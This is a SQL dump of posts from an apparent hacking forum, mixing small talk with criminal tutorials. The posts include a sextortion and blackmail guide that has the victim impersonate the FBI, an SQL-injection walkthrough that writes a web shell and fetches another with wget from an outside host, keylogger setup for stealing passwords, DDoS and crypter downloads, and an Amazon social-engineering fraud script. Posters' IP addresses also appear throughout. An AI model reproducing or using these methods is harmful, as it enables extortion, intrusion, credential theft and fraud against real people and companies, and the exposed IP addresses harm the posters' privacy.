`dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('73', '17', '55', '8', 'RE: My Dubstep Remixs', '0', '5', 'Timmy', '1340833317', '[quote=\'Triple H\' pid=\'55\' dateline=\'1340516596\'] Can you please stop using bold and x-large text? BTW what are dubstep remixes? [/quote] Dubstep is a genre of electronic dance music. Its overall sound has been described as \"tightly coiled productions with overwhelming bass lines and reverberant drum patterns, clipped samples, and occasional vocals\"', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', 'b0473027085b542112ebacfa5a818fb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('74', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '4', 'Triple H', '1340833462', 'Thanks for the review. I will give this a try.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', 'b1bbf8c210e802cae0a065933e250e95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('75', '15', '41', '9', 'RE: Adf.ly>Earn $$$ by clicks on links', '0', '4', 'Triple H', '1340833510', 'Thanks for using my referral bro.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', 'f1f150451639c901566942ae88ce8250', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1798', '378', '1742', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347375398', 'I thought my schools proxy would have blocked this site, weoo. Got something to do in between class now', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'a76c7d1cbb0b02145226d9e810ee5952', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('77', '21', '59', '16', 'RE: [GUIDE] In-depth reading of body language.', '0', '4', 'Triple H', '1340833672', 'Excellent tutorial. No words to describe tbh.', '41.174.23.131', '699275139', '0', '0', '0', '0', '1', '91ad2b1e13ec456a556b79853f3df99d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('78', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '1', 't3h jok3r', '1340833999', 'Next time, please provide a virus scan report including a link to the virus scan. I have tested the program and it\'s SAFE!', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', '2f2956b8b9869cfb6eb6963ccd0f3d1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('79', '26', '0', '17', '[tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1341181178', '[size=large]Before reading this tutorial, please read the spoiler below.[/size] [spoiler] This tutorial has NOT been leeched. This tutorial is allowed only on Hackforums, L33THacking and HMSEF, because I\'m the creator and the poster. Any other sites this tutorial is found on has been leeched. Any leeches of this tutorial are requested to be reported and the leechers personal data would be posted online. [/spoiler] [size=small][color=#FF0000]What is E-Whoring?[/color] E-Whoring is a black hat seo technique of making money online that translates into posing as a girl on the Internet. [color=#1E90FF]What/Who are \"PEDOS\"[/color] Pedos are perverts that who you use during ewhoring to get money from. [color=#FF4500]Requirements:[/color] paypal accounts [1 real one(for personal use) and another one for ewhoring] manycam messenger to communicate on. [color=#DCDCDC]OPTIONAL:[/color] if you will blackmail then you will need a another email id but it must be of fbi.gov So lets get started on how to ewhore. [color=#FFD700]Setting up Paypal[/color] Go to [i]paypal.com[/i] then click on \"[i]sign up[/i]\" change \"[i]your country[/i]\" to \"[i]canada[/i]\" Choose \"[i]PERSONAL[/i]\" ** [color=#9400D3]Fill in the empty spaces but skip the credit card part (DONT ENTER ANYTHING) and type in any random address and any random phone number but THEY MUST EXIST SO SEARCH IT UP ON GOOGLE**[/color] To view the steps via pics click on the spoilers below [spoiler] http://www.imageurlhost.com/images/sz6y5e1qc1uravubsncg.png http://www.imageurlhost.com/images/0hu46t0eycae4e2yev.png http://www.imageurlhost.com/images/xs3dfzhbasprkka30fdm.png [/spoiler] [color=#FF1493]Setting up Manycam[/color] Download it from here. http://download.cnet.com/ManyCam-Virtual...?tag=mncol Open it after you get done downloading it Go to [i]text over video[/i] and [i]uncheck[/i] the text over video option then go to [i]sources[/i]>[i]movies[/i]>[i]insert the ewhore video[/i] **[color=#32CD32]Note: Go to your messenger settings and change the webcam default to manycam virtual or the other manycam option(it doesnt really matter what u pick and on some pcs the other option is different)[/color] To view how to setup manycam in pics view the spoilers below [Spoiler] http://www.imageurlhost.com/images/zkptcfil8a4ngphrfsh.ping http://www.imageurlhost.com/images/dyd2hwztp0xt7ddax86s.png http://www.imageurlhost.com/images/qq45di0lhudfyr7y967e.png [/spoiler] [color=#FF0000]How to ewhore?[/color] Remember when your ewhoring you have to act like a girl. E.G: use alot of punctuations,if u make a error in the text correct it,flirt etc Use lines similar or these lines to get a pedo >looking for rich horny guys >im sellling VID/PICS for PRICE,pm me if ur interested <3 (i use MESSENGER and paypal) :D >Who wants to see me naked? >horny girl looking for horny guys P.S: some words girls use alot; mwah so sweeeet of you (USE 4 Es) thnkx hun awww lol,lmao,lmbo(laugh my booty off),rofl,roflol etc After you find them tell them to add you to your messenger and then flirt a little bit and then they always ask for a free preview then give him one and if u are using a video then show them the first few seconds of the video and then end the call and tell them that u have to pay to see more.Tell them to send it you to \"FAKE PAYPAL ACCOUNT @ **** [dot]com.As soon as they pay take the money and shift it to your real account.Then give them what they asked for. [color=#800000]Where can/do i have to Ewhore?[/color] You have to ewhore in chatrooms [color=#00BFFF]Links:[/color] http://www.chat-avenue.com/adultchat.html http://www.midnightchatcity.com/sex/ http://www.adultchat.net/ http://www.chat-web.com/adultschat/adultschat1.html http://www.chat-spiral.com/index.php?page=home http://omegle.com/ http://craigslist.org/ http://www.xxxchatters.com/ or search them up on google AKA google . com (WITHOUT SPACES) That was how to ewhore your pedo now im going to show you how to ewhore. [color=#FFD700]Requirements:[/color] >A fbi.gov email id (steps showen below on how to make one) >Some screenshots or a short video of you ewhoring your slave. >small basic skills of social engineering Optional: Fake Facebook account (make it with the fake email id you made for ewhoring NOT THE FBI.GOV) How to make a fbi.gov email id? 1 - go to http://passport.net 2 - select the option \" i will register with my own email account\" 3 - create the account with the desired domain name ( something@fbi.gov in this case) 4 - you are done, now you can use that account in MSN, but u wont have any inbox and also u cant change ur name on msn. Proof of this steps working in the spoilers below: http://www.imageurlhost.com/images/ccd9daxrgh2jjj0vjfqf.png View these steps via pics view the spoilers below: http://www.imageurlhost.com/images/nuwu2iw8w6y2idz3s4cq.png [color=#00BFFF]How to Blackmail your pedo?[/color] 95% of the blackmailing works if you sold a video/cam show to your pedo and there are only 20% chances if you sold pictures and if you dont know the basics of social engineering then you cant ever blackmail them.. Before giving them the show do a small chat and when you do then ask them some questions or use the ones posted below: [quote]Do you have facebook? if yes then ask them if you could add them Whats your email address again? How old are you? Whats your age? Which country are you living in? Do you have a girlfriend? [/quote] [b][color=#FF0000]PRINTSCREEN ALL THE QUESTIONS YOU ASKED AND THE ANSWER THEY GIVE.[/color][/b] Then before they log off tell them that you have printscreened THE PEDO or recorded THE PEDO watching you strip and your a underage and your real age is ANYTHING BUT UNDER 18.Tell them that you would report them to the fbi cybercrime unit if you dont pay me PRICE now.If they say they dont have any money then say \"ITS OK NO PROBLEM IT DOESNT BOTHER ME IF I GO TO THE CYBERCRIME AND REPORT YOU\" and if they ask wont you be in trouble for actually doing a show then say \"NO BECAUSE YOU ACTUALLY PAID ME REMEMBER I EVEN HAVE THE TRANSACTION REPORT AND IF YOU DISPUTE IT NO PROBLEM I EVEN HAVE A SCREENSHOT OF THAT TOO\". As soon as they pay,shift the money to your real paypal account. IF THEY DONT PAY THEN: The next day email them with the FAKE F B I.GOV EMAIL ADDRESS. Tell the pedo that you made a underage person do this and that,this was illegal and the punishment is this etc and tell them to pay a fine of PRICE to the fbi.gov site and give them a link to give a link to a paypal account you own BUT DONT GIVE OUT THE EWHORING ONE OTHER WISE THEY WILL FIND OUT ITS REALLY YOU NOT THE CYBERCRIME. then paste a copyright code similar to this. © copyright COMPANY NAME, 2005-2015. all rights reserved [color=#FFD700]EXTRA NOTES:[/color] [color=#DCDCDC]How to not be caught while ewhoring? [/color] Use a VPN from the start till the end (from the looking for pedo step till th e end of blackmailing/show) [color=#FF4500]Whats a VPN?[/color] Its a program that keeps your browsing anonymous.Its hard to find a free VPN but use hotspotshield because its easily plus free. Download link: http://cyberghostvpn.com/ That was my tutorial about how to ewhore and blackmail your pedo with pictures for newbies including a good maybe well explained text. Here are some download links to some ewhoring packs maybe you will need them for ewhoring. Pics: http://www.mediafire.com/?yxczx2831o7ac2q http://www.mediafire.com/?y5d4a43extbrio1 Videos: http://www.filesonic.com/file/1246848724 http://www.filesonic.com/file/2168987794 Differences between white hat,black hat and grey hat: [color=#000000]Blackhat:[/color] Illegal activities such as hacking into websites,cracking into accounts,social engineering etc. [color=#FFFFFF]Whitehat:[/color] Helping out others by hacking into stuff but doing it to stop the blackhats. [color=#DCDCDC]Greyhat[/color]: Grey hat is a group with white hat and black hat activities mixed. Good luck in ewhoring.[/size]', '41.151.155.217', '697801689', '1', '0', '1', '1341181301', '1', 'c80c80ee2233e0a476feaf388a3f0067', '0', '1341181301'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('80', '27', '0', '13', '[TuT] Upload Shell Through SQL Injection', '0', '5', 'Timmy', '1341182787', 'Note that this is a pretty rare vulnerability but it is out there! So lets start.. ( i will not show the URL in this tutorial for varous reasons.. ) And my code is a bit strange since the vulnerable column is a picture.. Vulnerable column (8): [spoiler] [img]http://i.imgur.com/BSxtF.png[/img] [/spoiler] Now we need to get the user ( if you cant do this it isn\'t vulnerable ) [code] union select 1,2,3,4,5,6,7,user,9 from mysql.user-- [/code] [spoiler] [img]http://i.imgur.com/AbYui.png[/img] [/spoiler] Success, our site is vulnerable. Now we need to check for permissions ( file_priv ) [code] union select 1,2,3,4,5,6,7,group_concat(user,0x3a,file_priv,\"
    \"),9 from mysql.user--[/code] [spoiler] [img]http://i.imgur.com/h0Ifg.png[/img] [img]http://i.imgur.com/uBN5s.png[/img] [/spoiler] Our current user has \" Y \" file privs, that means we can use this method Now lets write a file! ( we need full paths and be able to use \" in our query ) [code] union select 1,2,3,4,5,6,7,\"\",9 into outfile \"/var/www/shell.php\"--[/code] [spoiler] [img]http://i.imgur.com/Th1Ic.png[/img] [/spoiler] Now we have written our file \" shell.php \", lets use it. [code] shell.php?cmd=wget http://shellsite.org/shell.txt -O our_shell.php[/code] Big O is important! [spoiler] [img]http://i.imgur.com/YfHuS.png[/img] [/spoiler] Success ! we now have a fully working shell, without even getting into an admin panel [spoiler] [img]http://i.imgur.com/WCLkt.png[/img] [/spoiler] Credits: xB1N4RYx', '41.150.204.72', '697748552', '1', '0', '0', '0', '1', '20827849431b3ab426ecfa140e21e734', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('81', '17', '73', '8', 'RE: My Dubstep Remixs', '0', '1', 't3h jok3r', '1341433989', '[quote=\'Timmy\' pid=\'73\' dateline=\'1340833317\'] [quote=\'Triple H\' pid=\'55\' dateline=\'1340516596\'] Can you please stop using bold and x-large text? BTW what are dubstep remixes? [/quote] Dubstep is a genre of electronic dance music. Its overall sound has been described as \"tightly coiled productions with overwhelming bass lines and reverberant drum patterns, clipped samples, and occasional vocals\" [/quote] That\'s right. @OP I think you have updated the songs, I like them all.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'a6323fe1228cdcefff60ac16715c6381', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('82', '28', '0', '3', 'Buttons updated.', '0', '1', 't3h jok3r', '1341434168', 'I have updated the buttons to CSS from images. The benefits are that it saves me time and it can be translated into other languages easily. It took me around 45 minutes but I was able to work it out. If you find any button in images and not CSS then please let me know.', '41.174.22.238', '699274990', '1', '0', '1', '1341434227', '1', '12f6dfc7263678530d7211398a522879', '0', '1341434227'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('83', '29', '0', '15', '???Italian DoS tool (Great for hitting sites offline)???', '0', '1', 't3h jok3r', '1341434810', 'This is the best Italian DDoS created by [b]xXmanuddXx!![/b] In the \'\'sito vittima\'\' you must enter the website to destroy and click start! [align=center]Tutorial HD: [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=bC_GSQAd4lA[/video] [i][b]Program Preview in English[/b][/i] [spoiler] [img]http://i50.tinypic.com/29kp352.png[/img] [/spoiler] [b]VIRUSCAN:[/b] https://www.virustotal.com/file/6e2125a3.../analysis/ [lock][b]DOWNLOAD:[/b] http://www.mediafire.com/?y5kyrsrhv468o5n[/lock] [/align] P.S: Run it as Administrator and it may not work on sandboxie.', '41.174.22.238', '699274990', '1', '0', '1', '1352012128', '1', '28b1facd956d2094603ca64f30ded0a0', '0', '1352012128'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('84', '30', '0', '12', 'HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '4', 'Triple H', '1341435898', '[color=#FF0000]Download Rin Logger. (Link at the bottom of the tutorial) Run the keylogger file on your computer and hit on “Create new”.[/color] [img]http://2.bp.blogspot.com/-DXZmF9vB1VM/TnXvXTIj5-I/AAAAAAAAAW4/_H0spJWyEeg/s320/1.png[/img] [color=#FF1493]Now, enter the information as follows: Email address: Email address where you want to receive all hacked passwords. Use Gmail address (recommended). Account Password: Password of your Email address. Keylogger Recepients: Enter your Email and hit On Add.[/color] Hit on Next. Now, enter the time duration between two emails. If you set it to 5 minutes, you will receive emails after every 5 minutes. Hit on Next. [img]http://2.bp.blogspot.com/-SH4Hl_g16iE/TnXwR2m5XtI/AAAAAAAAAW8/CGD9NgxQ7iQ/s320/2.png[/img] [color=#00BFFF]Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”.[/color] [img]http://2.bp.blogspot.com/-vJT0Dq7nHHc/TnXxKDPbdkI/AAAAAAAAAXA/E8NcC-8RylU/s320/3.png[/img] [color=#32CD32]There are many more features in this key logger like Download Setup, Dialog Setup, Website Viewer, File Binder, MoZilla Firefox, Administrator Task etc. Now Set File Properties. Now, hit on “Save As” and select the path where you want to save your keyloggerserver file. Click on “Compile”.[/color] [img]http://2.bp.blogspot.com/--B8uj87RpXQ/TnX1EOo3R5I/AAAAAAAAAXE/Zw0pcbv00ng/s320/3.png[/img] [color=#FF4500]Done, This kelogger is very popular.[/color] [color=#FFD700]Other Features Melt File Downloader Web-Viewer Flexible fake Message Attach screenshots for each logging session Multiple log recipients[/color] [b]Download:[/b] http://www.mediafire.com/?95kxo3zqiatzzel The servers might get detected because this keylogger is popular and SAFE. This download has been approved by an Admin. A keylogger is a program that creates a server which your victim downloads and runs on their monitor then we receive all their keystrokes and more including passwords. Credits: criticallygeek.in/2012/02/how-to-setup-rinlogger-complete-and.html', '41.174.22.238', '699274990', '0', '0', '1', '1346078014', '1', '395ae7241469637050085f69d86c0da2', '0', '1346078014'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('85', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '4', 'Triple H', '1341435945', 'Thanks, I used it today to knock down a gaming website. Thanks a lot for the DDoSer', '41.174.22.238', '699274990', '0', '0', '0', '0', '1', '213f16f38f056baf0979a45fd81d2f27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('86', '31', '0', '7', 'How long are you online daily?', '0', '4', 'Triple H', '1341436045', 'How many hours do you spend on your computer?', '41.174.22.238', '699274990', '0', '0', '0', '0', '1', '8e28e4ba9dd748e08416019242673ab5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('87', '32', '0', '16', '[tut]How to SE Amazon Kindles', '0', '5', 'Timmy', '1341437012', '[color=#FF4500]How to SE Amazon Kindles the Complete Tutorial[/color] [color=#00BFFF]First you will need to download hotspotshield: http://hotspotshield.com/ Then you must run it every time before doing an SE for safety purposes. Remember to use hotspot shield throughout all of your SE!![/color] [color=#FFD700]Once you have hotspotshield running we can begin the SE.[/color] [color=#32CD32]First go to your local 7-11 and buy a vanilla visa $25 prepaid VCC. If you don’t have a 7-11 close by try CVS pharmacy. PM if you need one. [/color] [color=#32CD32]Once you get a hold of the VCC go ahead and create an email address. I use Hotmail.com because you can create a valid email address really quickly. [/color] [color=#9400D3]After creating an email address go to amazon.com and create a new account using that email address. Create a password and put in the name you want to use for the SE. It is useful to put all the info in a notepad document so you don’t have to remember it.[/color] [color=#FF1493]After you create your amazon account click on “your account” in the top right corner, then click on manage your kindle on the right hand side. Then click on register your kindle device and you should have a place to put in your kindle serial number. Here I will be teaching you how to SE a kindle fire so we will use a kindle fire serial.[/color] Find a kindle fire serial if you don’t have one on hand then use this one: [b]D01EB0A0146501AJ[/b]. Simply replace the last 3 characters (1AJ) with random letters until you get the device successfully registered. [color=#8B4513]Once you have done that click on “your account” again on the top right corner and navigate to manage payment options. Click to add a new Card and you should have a window open to put in your Card number and billing address. This is where the vcc comes into play. [/color] [color=#FFFFFF]Go ahead and visit the website vanillavisa.com. Click on the vanilla visa gift card tab, and put in your card info. Then on the left side you will see register this card, click on that. You will have a window open to put in your zip code. This is very important otherwise the VCC will not go through. Put in the zip code of the address you will be SEing the kindle to. Once that is done go back to your amazon account.[/color] [color=#FF0000]On your amazon account, fill out the card info including its number and expiration date. The cardholders name must match the name you put in your Amazon account when registering so make sure it’s the same. Put the billing address as the address you will be SEing the kindle too and make sure the zip code matches the zip code you registered your VCC with.[/color] [color=#1E90FF]Now that you have your kindle registered and your VCC on file its time to do the fun part! The call.[/color] [color=#FFD700]Go and get your phone and call this number (make sure to put the *67 in front to hide your number): *6718662161072 That is the number for the Amazon support, they work 24/7 in the US.(Download clownfish for extra security)[/color] [color=#FF0000][b]Have all your info ready on you notepad file because it makes things much more easier (including your name, email address, billing address, VCC)[/b][/color] [color=#00BFFF]Now the first thing they will ask you to do is provide them with an order number or an email address. Since we don’t have an order number give them your email address. They will make you verify your name and sometimes address, simply read what you have in your notepad.[/color] [color=#32CD32]Then they will ask you “what can we help you with today” You say: “I called in about 10 minutes ago about a defective kindle with screen problems but got disconnected while I was on hold”[/color] [color=#FF1493]They will apologize that you got disconnected and might ask you to give them more info about the defective kindle. Say:” I received the kindle as a gift and am having screen problems. My screen has some sort of discoloration and vertical lines going through it” The rep should transfer you to the kindle department. They will ask you the same thing and you should say the same thing “ I received the kindle as a gift about a month ago and started having issues with the screen. I called you guys 15 minutes ago and you had me register the defective kindle on my account and had me do a hard reset. However, that didn’t seem to help with the screen issue”.[/color] [color=#8B4513]The rep might ask you to perform another hard reset, just go with it and tell him that youre still experiencing the same problem. If all goes well then he should either transfer you to the replacement department or start on the replacement himself.[/color] [color=#FFD700]Whenever they start on a replacement they will ask you to verify your last 4 digits of the CC and the expiration date. They will also ask you to verify your billing address. When they ask you for the shipping address say it’s the same as the billing one. If you have registered the VCC on vanillavisa.com it should go through no problem, and the replacement should show up as “shipping soon” on your amazon account in the “your orders” tab.[/color] [color=#FFFFFF]Its THAT simple to SE amazon. Once the replacement processes you can go back on vanillavisa.com and check your balance on the card. You should see a 1$ hold on the account so you’ll have 30 days to spend the remaining 24$ on your gift card.[/color]', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'c718a8fefc1a28972ce3157263a7ea61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('88', '33', '0', '20', 'Heavens Crypter FUD', '0', '5', 'Timmy', '1341437435', '[img]http://i45.tinypic.com/34nmb5w.jpg[/img] http://anubis.iseclab.org/?action=result...ormat=html Scan report generated by NoVirusThanks.org [b]Report date:[/b] 2012-07-10 01:12:55 (GMT 1) [b]File name:[/b] [b]heavens-crypter-v1-exe[/b] [b]File size:[/b] 830976 bytes [b]MD5 hash:[/b] 450d24a06325aed922f387736e48bb9a [b]SHA1 hash:[/b] 4393781390d06d430ec8163565220cfa840bee3a [b]Detection rate:[/b] [b]0[/b] on 14 (0%) [b]Status:[/b] [color=#32CD32]CLEAN[/color] http://vscan.novirusthanks.org/analysis/...xLWV4ZQ==/ DOWNLOAD http://uploadmirrors.com/download/1KDGM0...ter_V1.rar http://www.mirrorcreator.com/files/0H8TI....rar_links Used to make keylogger and RAT servers FUD (Fully Undetected)', '41.174.22.238', '699274990', '1', '0', '1', '1342109879', '1', 'bc86c5cfd990ef42233fa9c470d0487b', '0', '1342109879'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('89', '28', '82', '3', 'RE: Buttons updated.', '0', '5', 'Timmy', '1341437507', 'This is a great update, very useful for people from other countries.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'e608468e91132aebf208fdfe06c612d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('90', '33', '88', '20', 'RE: Ferrari Black Crypter', '0', '1', 't3h jok3r', '1341437621', 'Great crypter. Haven\'t used it yet but heard a lot about it.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', '31c67247491eed50b22b3b9955111c8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('91', '31', '86', '7', 'RE: How long are you online daily?', '0', '2', 'Apathy', '1341461699', 'I spend more then I should online.', '173.206.130.232', '-1378975000', '0', '0', '0', '0', '1', 'efb48c94cf1dc6ab8f57cfa0e9338c2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('92', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '3', '??????????¢™', '1341627612', 'This is a pretty good tutorial OP, Keep it up.', '75.35.238.12', '1260645900', '1', '0', '0', '0', '1', '432f72a2afd5612c981503444a54e788', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('93', '34', '0', '3', 'L33THACKING.com is Back', '0', '1', 't3h jok3r', '1342041316', 'L33THacking.com was offline for a couple of days because we were moved to a new server by our hosting so we were having some server maintenance issues. Now we are back and hope we stay up for a long time.', '41.174.7.165', '699271077', '1', '0', '0', '0', '1', '8ae2738ffcc75318afaab7d6c3231b54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('94', '35', '0', '4', 'Reminiscing ?\'s Landed', '0', '11', 'Reminiscing ?', '1342041433', 'So hey there to the worldwide community of l33thacking. My names andre, 17 and friends with the forum creator, but don\'t misunderstand that for favoritism. I\'ve just actually recently turned over a new leaf and went White Hat, after seeing my friends going down from the justice system, the so called government. Back on topic; I don\'t bite and current partnership with l33thacking and my forum is currently pending, I won\'t release the link publicly due to the creators wishes.', '92.25.20.80', '1545147472', '0', '0', '0', '0', '1', '47a00bf013140fd4b444f61fc83fff13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('95', '35', '94', '4', 'RE: Reminiscing ?\'s Landed', '0', '1', 't3h jok3r', '1342102341', 'Welcome Reminiscing ?, I can\'t wait for your forum to be up so we can carry on with out deal. I\'m looking forward to chat with you today regarding our partnership. Hope you enjoy your time out on LH. P.S: I like the smile on your username.', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', 'ceeefb0d6d3c610a28f2d6fb78053be4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('96', '36', '0', '2', 'Attachments', '0', '1', 't3h jok3r', '1342105715', 'Attachments Style Test', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', '8dabd9416bd88ec06f1f3c7c28bf474f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('97', '37', '0', '5', 'Updates for 7/12/12', '0', '1', 't3h jok3r', '1342107856', 'LH was done for a couple of days so I browsed the MyBB site and found some create tutorials so I would like to share what new modifications I have done today. [b]MyBB PHP Website Firewall (with logs)[/b] [u][b]Security listing[/b][/u] * XSS protection * UNION SQL Injection protection * Bads bots protection * Bads requests methods protection * Small DOS protection * Inclusion files protection * Santy and others worms protection * Server Protection * URL Query protection * Cookies sanitize * Post vars sanitize * Get vars sanitize * IPs range reserved denied * IPs range spam denied * IPs protected * Unset globals PHP var [hr] [b]Moderator notifications (aka Mod Notify)[/b] Sends notifications (pm) to users in the event of moderators intervention. [i]Events I chose[/i] Unapprove or Approve Post. Unapprove or Approve Thread. Sticky or Unsticky a Thread. [hr] [b]CloudFlare Manager[/b] Now we can manage threats etc via ACP. [hr] [b]Show actual IP on postbit instead of logged word[/b] Now when on every post under the posters signature you will see the actual IP address. [hr] [b]Protect your Admin Directory with htpasswd[/b] You will need to enter the username and password you made above, then enter your forum details at the ACP login. [i]This is the best MyBB Admin Panel Security.[/i] P.S: Logins sent on Skype. [hr] [b]My 